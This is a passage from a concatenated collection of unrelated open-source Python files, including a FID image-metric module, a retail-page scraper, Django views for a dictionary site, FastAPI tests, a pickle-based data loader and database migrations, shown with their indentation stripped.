IEDocumentMetadata = apps.get_model('corpus', 'IEDocumentMetadata')
documents = IEDocument.objects.all()
total = documents.count()
objects_to_create = []
logger.info("Creating missing documents metadata objects")
for i, document in enumerate(documents.iterator()):
if i % BULK_SIZE == 0:
logger.info("Created {} out of {}".format(i, total))
if objects_to_create:
IEDocumentMetadata.objects.bulk_create(objects_to_create)
objects_to_create = []
objects_to_create.append(IEDocumentMetadata(
title=document.title,
url=document.url,
items=document.metadata,
document_tmp=document
))
if objects_to_create:
logger.info("Created {} out of {}".format(i+1, total))
IEDocumentMetadata.objects.bulk_create(objects_to_create)
logger.info("Updating documents to point to their metadata objects")
doc_mtds = IEDocumentMetadata.objects.filter(document_tmp__metadata_fk__isnull=True)
total = doc_mtds.count()
for i, doc_mtd in enumerate(doc_mtds):
if i % BULK_SIZE == 0:
logger.info("Updated {} out of {}".format(i, total))
IEDocument.objects.filter(pk=doc_mtd.document_tmp_id).update(metadata_fk=doc_mtd.id)
logger.info("Updated {} out of {}".format(total, total))
class Migration(migrations.Migration):
dependencies = [
('corpus', '0013_create_metadata_model'),
]
operations = [
migrations.RunPython(move_metadata),
]
|
metrics/fid.py | iviazovetskyi/rewriting | 526 | 12770107 | from __future__ import absolute_import, division, print_function
import torch
import warnings
from tqdm import tqdm
import pathlib
from scipy import linalg
import tensorflow as tf
import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def check_or_download_inception(inception_path):
''' Checks if the path to the inception file is valid, or downloads
the file if it is not present. '''
INCEPTION_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
if inception_path is None:
inception_path = '/tmp'
inception_path = pathlib.Path(inception_path)
model_file = inception_path / 'classify_image_graph_def.pb'
if not model_file.exists():
print("Downloading Inception model")
from urllib import request
import tarfile
fn, _ = request.urlretrieve(INCEPTION_URL)
with tarfile.open(fn, mode='r') as f:
f.extract('classify_image_graph_def.pb', str(model_file.parent))
return str(model_file)
def create_inception_graph(pth):
"""Creates a graph from saved GraphDef file."""
# Creates graph from saved graph_def.pb.
with tf.io.gfile.GFile(pth, 'rb') as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='FID_Inception_Net')
def calculate_activation_statistics(images,
sess,
batch_size=50,
verbose=False):
"""Calculation of the statistics used by the FID.
Params:
-- images : Numpy array of dimension (n_images, hi, wi, 3). The values
must lie between 0 and 255.
-- sess : current session
-- batch_size : the images numpy array is split into batches with batch size
batch_size. A reasonable batch size depends on the available hardware.
-- verbose : If set to True and parameter out_step is given, the number of calculated
batches is reported.
Returns:
-- mu : The mean over samples of the activations of the pool_3 layer of
               the inception model.
-- sigma : The covariance matrix of the activations of the pool_3 layer of
               the inception model.
"""
act = get_activations(images, sess, batch_size, verbose)
mu = np.mean(act, axis=0)
sigma = np.cov(act, rowvar=False)
return mu, sigma
# code for handling inception net derived from
# https://github.com/openai/improved-gan/blob/master/inception_score/model.py
def _get_inception_layer(sess):
"""Prepares inception net for batched usage and returns pool_3 layer. """
layername = 'FID_Inception_Net/pool_3:0'
pool3 = sess.graph.get_tensor_by_name(layername)
ops = pool3.graph.get_operations()
for op_idx, op in enumerate(ops):
for o in op.outputs:
shape = o.get_shape()
if shape._dims != []:
shape = [s.value for s in shape]
new_shape = []
for j, s in enumerate(shape):
if s == 1 and j == 0:
new_shape.append(None)
else:
new_shape.append(s)
o.__dict__['_shape_val'] = tf.TensorShape(new_shape)
return pool3
# -------------------------------------------------------------------------------
def get_activations(images, sess, batch_size=200, verbose=False):
"""Calculates the activations of the pool_3 layer for all images.
Params:
-- images : Numpy array of dimension (n_images, hi, wi, 3). The values
                     must lie between 0 and 255.
-- sess : current session
-- batch_size : the images numpy array is split into batches with batch size
                     batch_size. A reasonable batch size depends on the available hardware.
-- verbose : If set to True and parameter out_step is given, the number of calculated
batches is reported.
Returns:
-- A numpy array of dimension (num images, 2048) that contains the
activations of the given tensor when feeding inception with the query tensor.
"""
inception_layer = _get_inception_layer(sess)
n_images = images.shape[0]
if batch_size > n_images:
print(
"warning: batch size is bigger than the data size. setting batch size to data size"
)
batch_size = n_images
n_batches = n_images // batch_size
pred_arr = np.empty((n_images, 2048))
for i in tqdm(range(n_batches)):
if verbose:
print("\rPropagating batch %d/%d" % (i + 1, n_batches),
end="",
flush=True)
start = i * batch_size
if start + batch_size < n_images:
end = start + batch_size
else:
end = n_images
batch = images[start:end]
pred = sess.run(inception_layer,
{'FID_Inception_Net/ExpandDims:0': batch})
pred_arr[start:end] = pred.reshape(batch_size, -1)
if verbose:
print(" done")
return pred_arr
# -------------------------------------------------------------------------------
def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6):
"""Numpy implementation of the Frechet Distance.
The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
and X_2 ~ N(mu_2, C_2) is
d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).
Stable version by <NAME>.
Params:
-- mu1 : Numpy array containing the activations of the pool_3 layer of the
               inception net (like those returned by the function 'get_activations')
for generated samples.
    -- mu2   : The sample mean over activations of the pool_3 layer, precalculated
               on a representative data set.
-- sigma1: The covariance matrix over activations of the pool_3 layer for
generated samples.
-- sigma2: The covariance matrix over activations of the pool_3 layer,
               precalculated on a representative data set.
Returns:
-- : The Frechet Distance.
"""
mu1 = np.atleast_1d(mu1)
mu2 = np.atleast_1d(mu2)
sigma1 = np.atleast_2d(sigma1)
sigma2 = np.atleast_2d(sigma2)
assert mu1.shape == mu2.shape, "Training and test mean vectors have different lengths"
assert sigma1.shape == sigma2.shape, "Training and test covariances have different dimensions"
diff = mu1 - mu2
# product might be almost singular
covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False)
if not np.isfinite(covmean).all():
msg = "fid calculation produces singular product; adding %s to diagonal of cov estimates" % eps
warnings.warn(msg)
offset = np.eye(sigma1.shape[0]) * eps
covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset))
# numerical error might give slight imaginary component
if np.iscomplexobj(covmean):
if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3):
m = np.max(np.abs(covmean.imag))
raise ValueError("Imaginary component {}".format(m))
covmean = covmean.real
tr_covmean = np.trace(covmean)
return diff.dot(diff) + np.trace(sigma1) + np.trace(
sigma2) - 2 * tr_covmean
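# Sanity check on the formula implemented above: for Gaussians N(mu1, C1) and
# N(mu2, C2),
#     d^2 = ||mu1 - mu2||^2 + Tr(C1 + C2 - 2*sqrt(C1*C2)),
# so when C1 == C2 the trace term vanishes and d^2 reduces to ||mu1 - mu2||^2;
# identical statistics therefore give a distance of 0 (up to numerical error):
#
#     mu, cov = np.zeros(4), np.eye(4)
#     assert abs(calculate_frechet_distance(mu, cov, mu, cov)) < 1e-6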
def pt_to_np(imgs):
'''normalizes pytorch image in [-1, 1] to [0, 255]'''
normalized = [((img / 2 + 0.5) * 255).clamp(0, 255) for img in imgs]
return np.array([img.permute(1, 2, 0).numpy() for img in normalized])
def compute_fid_given_images(fake_images, real_images):
'''requires that the image batches are numpy format, normalized to 0, 255'''
inception_path = check_or_download_inception(None)
create_inception_graph(inception_path)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
if isinstance(fake_images, tuple):
m1, s1 = fake_images
else:
m1, s1 = calculate_activation_statistics(fake_images, sess)
if isinstance(real_images, tuple):
m2, s2 = real_images
else:
m2, s2 = calculate_activation_statistics(real_images, sess)
return calculate_frechet_distance(m1, s1, m2, s2)
def compute_fid_given_path(path):
with np.load(path) as data:
fake_imgs = data['fake']
real_imgs = data['real']
return compute_fid_given_images(fake_imgs, real_imgs)
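# The .npz file read above is expected to contain two image batches stored under
# the keys 'fake' and 'real'. A hypothetical way to produce such a file (the
# shapes and sample count are illustrative; values must be (N, H, W, 3) arrays
# in the 0-255 range):
#
#     fake = np.random.randint(0, 256, size=(64, 299, 299, 3)).astype(np.float32)
#     real = np.random.randint(0, 256, size=(64, 299, 299, 3)).astype(np.float32)
#     np.savez('fid_batches.npz', fake=fake, real=real)
#     print(compute_fid_given_path('fid_batches.npz'))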
def load_from_path(source):
root = '/data/vision/torralba/ganprojects/placesgan/tracer/utils/fid_stats/'
path = os.path.join(root, f'{source}_stats.npz')
if os.path.exists(path):
print('Loading statistics from ', path)
with np.load(path) as data:
return data['m'], data['s']
else:
print("Stats not found in path", path)
exit()
def compute_fid(source1, source2):
if isinstance(source1, str):
source1 = load_from_path(source1)
if isinstance(source1, torch.Tensor):
source1 = pt_to_np(source1)
if isinstance(source2, str):
source2 = load_from_path(source2)
if isinstance(source2, torch.Tensor):
source2 = pt_to_np(source2)
return compute_fid_given_images(source1, source2)
if __name__ == '__main__':
import argparse
from PIL import Image
from torchvision import transforms
parser = argparse.ArgumentParser()
parser.add_argument('--source')
parser.add_argument('--target')
args = parser.parse_args()
transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
images1 = []
for file_name in tqdm(os.listdir(args.source)):
if file_name.lower().endswith(('.png', 'jpeg', '.jpg')):
path = os.path.join(args.source, file_name)
images1.append(transform(Image.open(path).convert('RGB')))
images1 = torch.stack(images1)
images2 = []
for file_name in tqdm(os.listdir(args.source)):
if file_name.lower().endswith(('.png', 'jpeg', '.jpg')):
path = os.path.join(args.source, file_name)
images2.append(transform(Image.open(path).convert('RGB')))
images2 = torch.stack(images2)
result = compute_fid(images1, images2)
print(result)
with open('fid_results.txt', 'a+') as f:
f.write(args.source + args.target + ':\n')
f.write(str(result) + '\n')
|
__scraping__/oldnavy.gap.com/main.py | whitmans-max/python-examples | 140 | 12770133 | #!/usr/bin/env python3
# date: 2016.11.24 (update: 2020.06.13)
# https://stackoverflow.com/questions/40777864/retrieving-all-information-from-page-beautifulsoup/
from selenium import webdriver
from bs4 import BeautifulSoup
import time
# --- get page ---
link = 'http://oldnavy.gap.com/browse/category.do?cid=1035712&sop=true'
#driver = webdriver.PhantomJS() # deprecated
driver = webdriver.Firefox()
driver.get(link)
time.sleep(3)
# --- scrolling ---
#size = driver.get_window_size()
#print(size)
#window_height = size['height']
#print('window_height:', window_height) # webpage + toolbars + border
# https://stackoverflow.com/questions/1248081/how-to-get-the-browser-viewport-dimensions
# this may give too big a value because it includes the scrollbar's height (i.e. 962 = 950+22)
#viewport_height = driver.execute_script('return window.innerHeight;')
#print('viewport_height:', viewport_height)
# this gives correct value without scrollbar (ie. 950)
viewport_height = driver.execute_script('return document.documentElement.clientHeight;')
print('viewport_height:', viewport_height)
y = 0 # position to scroll
# at the start it has to be bigger than `y` so that the `while y < page_height:` loop runs
page_height = 1
#page_height = driver.execute_script('return document.body.scrollHeight;')
while y < page_height:
y += viewport_height # move only visible height
print('y:', y, 'page_height:', page_height)
# scroll
driver.execute_script(f'window.scrollTo(0, {y});')
# browser may need time to update page
time.sleep(0.5)
# get page height (it can change when JavaScript adds elements)
page_height = driver.execute_script('return document.body.scrollHeight;')
# --- get data with BeautifulSoup ---
base_url = 'http://www.oldnavy.com'
html = driver.page_source
soup = BeautifulSoup(html, 'html5lib')
all_divs = soup.find_all('div', class_='product-card') # new layout
print('len(all_divs):', len(all_divs))
#for div in all_divs:
# link = div.find('a')
# print(link.text)
# print(base_url + link['href'])
# --- get data with Selenium ---
all_products = driver.find_elements_by_class_name('product-card')
print('len(all_products):', len(all_products))
for product in all_products:
link = product.find_element_by_tag_name('a')
print(link.text)
# print(base_url + link['href'])
|
dictionary/views/edit.py | ankitgc1/django-sozluk-master | 248 | 12770142 | from django.contrib import messages as notifications
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.db.models import F, Q
from django.db.models.functions import Coalesce
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect
from django.urls import reverse, reverse_lazy
from django.utils import timezone
from django.utils.translation import gettext, gettext_lazy as _
from django.views.generic import CreateView, FormView, UpdateView
from dictionary.forms.edit import EntryForm, PreferencesForm
from dictionary.models import Author, Comment, Entry, Topic
from dictionary.utils import time_threshold
class UserPreferences(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = Author
form_class = PreferencesForm
template_name = "dictionary/user/preferences/index.html"
success_message = _("settings are saved, dear")
success_url = reverse_lazy("user_preferences")
def get_object(self, queryset=None):
return self.request.user
def form_invalid(self, form):
notifications.error(self.request, gettext("we couldn't handle your request. try again later."))
return super().form_invalid(form)
class EntryCreateMixin:
model = Entry
form_class = EntryForm
def form_valid(self, form):
"""
        The user sent a new entry whose topic may or may not exist yet. If the
        topic exists, this adds the entry and redirects to the entry permalink;
        otherwise the topic is created first, provided the title is valid.
        Entry.save() sets the created_by field of the topic.
"""
draft_pk = self.request.POST.get("pub_draft_pk", "")
publishing_draft = draft_pk.isdigit()
if (not publishing_draft) and (self.topic.exists and self.topic.is_banned):
# Cannot check is_banned before checking its existence.
notifications.error(self.request, _("we couldn't handle your request. try again later."))
return self.form_invalid(form)
status = self.request.user.entry_publishable_status
if status is not None:
notifications.error(self.request, status, extra_tags="persistent")
if publishing_draft:
return redirect(reverse("entry_update", kwargs={"pk": int(draft_pk)}))
return self.form_invalid(form)
if publishing_draft:
try:
entry = Entry.objects_all.get(
pk=int(draft_pk), is_draft=True, author=self.request.user, topic__is_banned=False
)
entry.content = form.cleaned_data["content"]
entry.is_draft = False
entry.date_created = timezone.now()
entry.date_edited = None
except Entry.DoesNotExist:
notifications.error(self.request, _("we couldn't handle your request. try again later."))
return self.form_invalid(form)
else:
# Creating a brand new entry.
entry = form.save(commit=False)
entry.author = self.request.user
if self.topic.exists:
entry.topic = self.topic
else:
if not self.topic.valid:
notifications.error(self.request, _("curses to such a topic anyway."), extra_tags="persistent")
return self.form_invalid(form)
entry.topic = Topic.objects.create_topic(title=self.topic.title)
entry.save()
notifications.info(self.request, _("the entry was successfully launched into stratosphere"))
return redirect(reverse("entry-permalink", kwargs={"entry_id": entry.id}))
def form_invalid(self, form):
if form.errors:
for err in form.errors["content"]:
notifications.error(self.request, err, extra_tags="persistent")
return super().form_invalid(form)
class EntryCreate(LoginRequiredMixin, EntryCreateMixin, FormView):
template_name = "dictionary/edit/entry_create.html"
def dispatch(self, request, *args, **kwargs):
self.extra_context = {"title": self.request.POST.get("title", "")}
return super().dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["recent_drafts"] = (
Entry.objects_all.filter(
Q(date_created__gte=time_threshold(hours=24)) | Q(date_edited__gte=time_threshold(hours=24)),
is_draft=True,
author=self.request.user,
)
.select_related("topic")
.only("topic__title", "date_created", "date_edited")
.alias(last_edited=Coalesce(F("date_edited"), F("date_created")))
.order_by("-last_edited")[:5]
)
return context
def form_valid(self, form):
if not self.request.POST.get("pub_draft_pk", "").isdigit():
# Topic object is only required if not publishing a draft.
self.topic = Topic.objects.get_or_pseudo(unicode_string=self.extra_context.get("title")) # noqa
return super().form_valid(form)
class EntryUpdate(LoginRequiredMixin, UpdateView):
model = Entry
form_class = EntryForm
template_name = "dictionary/edit/entry_update.html"
context_object_name = "entry"
def form_valid(self, form):
entry = form.save(commit=False)
if self.request.user.is_suspended or entry.topic.is_banned:
notifications.error(self.request, gettext("you lack the required permissions."))
return super().form_invalid(form)
if entry.is_draft:
status = self.request.user.entry_publishable_status
if status is not None:
notifications.error(self.request, status, extra_tags="persistent")
return super().form_invalid(form)
entry.is_draft = False
entry.date_created = timezone.now()
entry.date_edited = None
notifications.info(self.request, gettext("the entry was successfully launched into stratosphere"))
else:
entry.date_edited = timezone.now()
return super().form_valid(form)
def form_invalid(self, form):
for error in form.errors["content"]:
notifications.error(self.request, error)
return super().form_invalid(form)
def get_queryset(self):
return Entry.objects_all.filter(author=self.request.user)
class CommentMixin(LoginRequiredMixin, SuccessMessageMixin):
model = Comment
fields = ("content",)
template_name = "dictionary/edit/comment_form.html"
def form_invalid(self, form):
for error in form.errors["content"]:
notifications.error(self.request, error)
return super().form_invalid(form)
class CommentCreate(CommentMixin, CreateView):
success_message = _("the comment was successfully launched into stratosphere")
entry = None
def dispatch(self, request, *args, **kwargs):
self.entry = get_object_or_404(Entry.objects_published, pk=self.kwargs.get("pk"))
if not (
request.user.has_perm("dictionary.can_comment") and self.entry.topic.is_ama and request.user.is_accessible
):
raise Http404
return super().dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["entry"] = self.entry
return context
def form_valid(self, form):
comment = form.save(commit=False)
comment.author = self.request.user
comment.entry = self.entry
comment.save()
return super().form_valid(form)
class CommentUpdate(CommentMixin, UpdateView):
success_message = _("the comment has been updated")
def get_object(self, queryset=None):
return get_object_or_404(Comment, pk=self.kwargs.get(self.pk_url_kwarg), author=self.request.user)
def form_valid(self, form):
if self.request.POST.get("delete"):
self.object.delete()
notifications.success(self.request, gettext("the comment has been deleted"))
return redirect(self.object.entry.get_absolute_url())
if not self.request.user.is_accessible:
notifications.error(
self.request, gettext("you lack the permissions to edit this comment. you might as well delete it?")
)
return self.form_invalid(form)
comment = form.save(commit=False)
comment.date_edited = timezone.now()
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["entry"] = self.object.entry
context["updating"] = True
return context
|
bits_wilp/isPalindrome.py | deepak5998/Py | 726 | 12770163 | def isPalindrome(str):
result = False
if str == str[::-1]:
result = True
return result
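# Note: str[::-1] builds the reversed string, so the check above compares the
# text exactly as typed (isPalindrome("racecar") is True, but
# isPalindrome("Racecar") is False). A case-insensitive variant could first
# normalise the input, e.g. (illustrative only):
#
#     def isPalindromeIgnoreCase(text):
#         text = text.lower()
#         return text == text[::-1]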
print("Please enter a string: ")
x = input()
flag = isPalindrome(x)
if flag:
print(x, "is a Palindrome")
else:
print(x, "is NOT a Palindrome")
|
tests/test_fastapi/test_more_reallife_fastapi.py | ivangirko/ormar | 905 | 12770172 | <filename>tests/test_fastapi/test_more_reallife_fastapi.py
import asyncio
from typing import List, Optional
import databases
import pytest
import sqlalchemy
from fastapi import FastAPI
from starlette.testclient import TestClient
import ormar
from tests.settings import DATABASE_URL
app = FastAPI()
metadata = sqlalchemy.MetaData()
database = databases.Database(DATABASE_URL, force_rollback=True)
app.state.database = database
@app.on_event("startup")
async def startup() -> None:
database_ = app.state.database
if not database_.is_connected:
await database_.connect()
@app.on_event("shutdown")
async def shutdown() -> None:
database_ = app.state.database
if database_.is_connected:
await database_.disconnect()
class Category(ormar.Model):
class Meta:
tablename = "categories"
metadata = metadata
database = database
id: int = ormar.Integer(primary_key=True)
name: str = ormar.String(max_length=100)
class Item(ormar.Model):
class Meta:
tablename = "items"
metadata = metadata
database = database
id: int = ormar.Integer(primary_key=True)
name: str = ormar.String(max_length=100)
category: Optional[Category] = ormar.ForeignKey(Category, nullable=True)
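# With the ForeignKey above, request/response payloads nest the related object,
# e.g. the body posted further down in the test:
#     {"name": "test", "id": 1, "category": {"id": 1, "name": "test cat"}}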
@pytest.fixture(autouse=True, scope="module")
def create_test_database():
engine = sqlalchemy.create_engine(DATABASE_URL)
metadata.create_all(engine)
yield
metadata.drop_all(engine)
@app.get("/items/", response_model=List[Item])
async def get_items():
items = await Item.objects.select_related("category").all()
return items
@app.get("/items/raw/", response_model=List[Item])
async def get_raw_items():
items = await Item.objects.all()
return items
@app.post("/items/", response_model=Item)
async def create_item(item: Item):
await item.save()
return item
@app.post("/categories/", response_model=Category)
async def create_category(category: Category):
await category.save()
return category
@app.get("/items/{item_id}")
async def get_item(item_id: int):
item = await Item.objects.get(pk=item_id)
return item
@app.put("/items/{item_id}")
async def update_item(item_id: int, item: Item):
item_db = await Item.objects.get(pk=item_id)
return await item_db.update(**item.dict())
@app.delete("/items/{item_id}")
async def delete_item(item_id: int, item: Item = None):
if item:
return {"deleted_rows": await item.delete()}
item_db = await Item.objects.get(pk=item_id)
return {"deleted_rows": await item_db.delete()}
def test_all_endpoints():
client = TestClient(app)
with client as client:
response = client.post("/categories/", json={"name": "test cat"})
category = response.json()
response = client.post(
"/items/", json={"name": "test", "id": 1, "category": category}
)
item = Item(**response.json())
assert item.pk is not None
response = client.get("/items/")
items = [Item(**item) for item in response.json()]
assert items[0] == item
item.name = "New name"
response = client.put(f"/items/{item.pk}", json=item.dict())
assert response.json() == item.dict()
response = client.get("/items/")
items = [Item(**item) for item in response.json()]
assert items[0].name == "New name"
response = client.get("/items/raw/")
items = [Item(**item) for item in response.json()]
assert items[0].name == "New name"
assert items[0].category.name is None
response = client.get(f"/items/{item.pk}")
new_item = Item(**response.json())
assert new_item == item
response = client.delete(f"/items/{item.pk}")
assert response.json().get("deleted_rows", "__UNDEFINED__") != "__UNDEFINED__"
response = client.get("/items/")
items = response.json()
assert len(items) == 0
client.post("/items/", json={"name": "test_2", "id": 2, "category": category})
response = client.get("/items/")
items = response.json()
assert len(items) == 1
item = Item(**items[0])
response = client.delete(f"/items/{item.pk}", json=item.dict())
assert response.json().get("deleted_rows", "__UNDEFINED__") != "__UNDEFINED__"
response = client.get("/docs/")
assert response.status_code == 200
|
scripts/normalization.py | ysy6868/STPF | 958 | 12770195 | #! /usr/bin/python
'''
Data Normalization
'''
from sklearn import preprocessing
def normalize(file_dataframe, cols):
'''
Data Normalization.
'''
for col in cols:
        # normalize() expects a 2-D array and returns the scaled values, so pass
        # the column as an (n, 1) array and write the result back
        file_dataframe[col] = preprocessing.normalize(
            file_dataframe[[col]].values, axis=0, norm='l2').ravel()
return file_dataframe |
veles/loader/pickles.py | AkshayJainG/veles | 1,007 | 12770208 | # -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jan 25, 2015
Loaders which get data from pickles
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import pickle
import numpy
import six
from zope.interface import implementer
from veles import error
from veles.compat import from_none
from veles.external.progressbar import ProgressBar
from veles.memory import interleave
from veles.loader.base import CLASS_NAME, Loader
from veles.loader.image import IImageLoader, COLOR_CHANNELS_MAP
from veles.loader.fullbatch import FullBatchLoader, IFullBatchLoader
from veles.loader.fullbatch_image import FullBatchImageLoader
@implementer(IFullBatchLoader)
class PicklesLoader(FullBatchLoader):
"""
Loads samples from pickles for data set.
"""
def __init__(self, workflow, **kwargs):
super(PicklesLoader, self).__init__(workflow, **kwargs)
self._test_pickles = list(kwargs.get("test_pickles", []))
self._validation_pickles = list(kwargs.get("validation_pickles", []))
self._train_pickles = list(kwargs.get("train_pickles", []))
self._pickles = (self.test_pickles, self.validation_pickles,
self.train_pickles)
@property
def test_pickles(self):
return self._test_pickles
@property
def validation_pickles(self):
return self._validation_pickles
@property
def train_pickles(self):
return self._train_pickles
def reshape(self, shape):
return shape
def transform_data(self, data):
return data
def load_data(self):
pbar = ProgressBar(maxval=sum(len(p) for p in self._pickles),
term_width=40)
self.info("Loading %d pickles...", pbar.maxval)
pbar.start()
loaded = [self.load_pickles(i, self._pickles[i], pbar)
for i in range(3)]
pbar.finish()
self.info("Initializing the arrays...")
shape = loaded[2][1][0].shape[1:]
for i in range(2):
if loaded[i][0] > 0:
shi = loaded[i][1][0].shape[1:]
if shape != shi:
                    raise error.BadFormatError(
                        "TRAIN and %s sets have different sample shapes "
                        "(%s vs %s)" % (CLASS_NAME[i], shape, shi))
self.create_originals(self.reshape(shape))
offsets = [0, 0]
for ds in range(3):
if loaded[ds][0] == 0:
continue
for arr in loaded[ds][1]:
self.original_data[offsets[0]:(offsets[0] + arr.shape[0])] = \
self.transform_data(arr)
offsets[0] += arr.shape[0]
for arr in loaded[ds][2]:
self.original_labels[offsets[1]:(offsets[1] + arr.shape[0])] =\
arr
offsets[1] += arr.shape[0]
def load_pickles(self, index, pickles, pbar):
unpickled = []
for pick in pickles:
try:
with open(pick, "rb") as fin:
self.debug("Loading %s...", pick)
if six.PY3:
loaded = pickle.load(fin, encoding='charmap')
else:
loaded = pickle.load(fin)
unpickled.append(loaded)
pbar.inc()
except Exception as e:
self.warning(
"Failed to load %s (part of %s set)" %
(pick, CLASS_NAME[index]))
raise from_none(e)
data = []
labels = []
for obj, pick in zip(unpickled, pickles):
if not isinstance(obj, dict):
raise TypeError(
"%s has the wrong format (part of %s set)" %
(pick, CLASS_NAME[index]))
try:
data.append(obj["data"])
labels.append(
numpy.array(obj["labels"], dtype=Loader.LABEL_DTYPE))
except KeyError as e:
self.error("%s has the wrong format (part of %s set)",
pick, CLASS_NAME[index])
raise from_none(e)
lengths = [0, sum(len(l) for l in labels)]
for arr in data:
lengths[0] += arr.shape[0]
if arr.shape[1:] != data[0].shape[1:]:
raise error.BadFormatError(
"Array has a different shape: expected %s, got %s"
"(%s set)" % (data[0].shape[1:],
arr.shape[1:], CLASS_NAME[index]))
if lengths[0] != lengths[1]:
            raise error.BadFormatError(
                "Data and labels have different numbers of samples (data %d,"
                " labels %d)" % tuple(lengths))
length = lengths[0]
self.class_lengths[index] = length
return length, data, labels
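    # Each pickle consumed above is expected to be a dict with a "data" array of
    # samples and a matching "labels" sequence, e.g. (shapes illustrative only):
    #
    #     with open("train_part0.pickle", "wb") as fout:
    #         pickle.dump({"data": numpy.zeros((100, 28, 28)),
    #                      "labels": list(range(100))}, fout)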
@implementer(IImageLoader)
class PicklesImageFullBatchLoader(PicklesLoader, FullBatchImageLoader):
MAPPING = "full_batch_pickles_image"
def __init__(self, workflow, **kwargs):
super(PicklesImageFullBatchLoader, self).__init__(workflow, **kwargs)
# Since we can not extract the color space information from pickles
# set it explicitly without any default value
self.color_space = kwargs["color_space"]
def get_image_label(self, key):
return int(self.image_labels[key])
def get_image_info(self, key):
return self.image_data[key].shape[:2], self.color_space
def get_image_data(self, key):
return self.image_data[key]
def get_keys(self, index):
offsets = [0, self.class_lengths[0],
self.class_lengths[0] + self.class_lengths[1],
self.total_samples]
self.original_shape = self.image_data.shape[1:-1]
return range(offsets[index], offsets[index + 1])
def reshape(self, shape):
if shape[0] == COLOR_CHANNELS_MAP[self.color_space]:
return shape[1:] + (shape[0],)
return shape
def transform_data(self, data):
if data.shape[1] == COLOR_CHANNELS_MAP[self.color_space]:
return interleave(data)
return data
def load_data(self):
PicklesLoader.load_data(self)
self.original_class_lengths = self.class_lengths
self.image_data = self.original_data.mem
self.original_data.mem = None
self.image_labels = self.original_labels[:]
del self.original_labels[:]
FullBatchImageLoader.load_data(self)
assert self.original_class_lengths == self.class_lengths
del self.image_data
def initialize(self, device, **kwargs):
super(PicklesImageFullBatchLoader, self).initialize(
device=device, **kwargs)
del self.image_labels
|
wyze_sdk/service/__init__.py | RebelTat/wyze-sdk | 132 | 12770220 | from .api_service import ApiServiceClient # noqa
from .auth_service import AuthServiceClient # noqa
from .earth_service import EarthServiceClient # noqa
from .ford_service import FordServiceClient # noqa
from .general_api_service import GeneralApiServiceClient # noqa
from .platform_service import PlatformServiceClient # noqa
from .scale_service import ScaleServiceClient # noqa
from .venus_service import VenusServiceClient # noqa
from .wyze_response import WyzeResponse # noqa
|
aiida/backends/sqlalchemy/migrations/versions/162b99bca4a2_drop_dbcalcstate.py | azadoks/aiida-core | 180 | 12770250 | <reponame>azadoks/aiida-core<filename>aiida/backends/sqlalchemy/migrations/versions/162b99bca4a2_drop_dbcalcstate.py
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name,no-member
"""Drop the DbCalcState table
Revision ID: <KEY>
Revises: a603da2cc809
Create Date: 2018-11-14 08:37:13.719646
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = 'a603da2cc809'
branch_labels = None
depends_on = None
def upgrade():
op.drop_table('db_dbcalcstate')
def downgrade():
op.create_table(
'db_dbcalcstate', sa.Column('id', sa.INTEGER(), nullable=False),
sa.Column('dbnode_id', sa.INTEGER(), autoincrement=False, nullable=True),
sa.Column('state', sa.VARCHAR(length=255), autoincrement=False, nullable=True),
sa.Column('time', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['dbnode_id'], ['db_dbnode.id'],
name='db_dbcalcstate_dbnode_id_fkey',
ondelete='CASCADE',
initially='DEFERRED',
deferrable=True), sa.PrimaryKeyConstraint('id', name='db_dbcalcstate_pkey'),
sa.UniqueConstraint('dbnode_id', 'state', name='db_dbcalcstate_dbnode_id_state_key')
)
|
contextily/_providers.py | jpn--/contextily | 163 | 12770282 | """
Tile providers.
This file is autogenerated! It is a python representation of the leaflet
providers defined by the leaflet-providers.js extension to Leaflet
(https://github.com/leaflet-extras/leaflet-providers).
Credit to the leaflet-providers.js project (BSD 2-Clause "Simplified" License)
and the Leaflet Providers contributors.
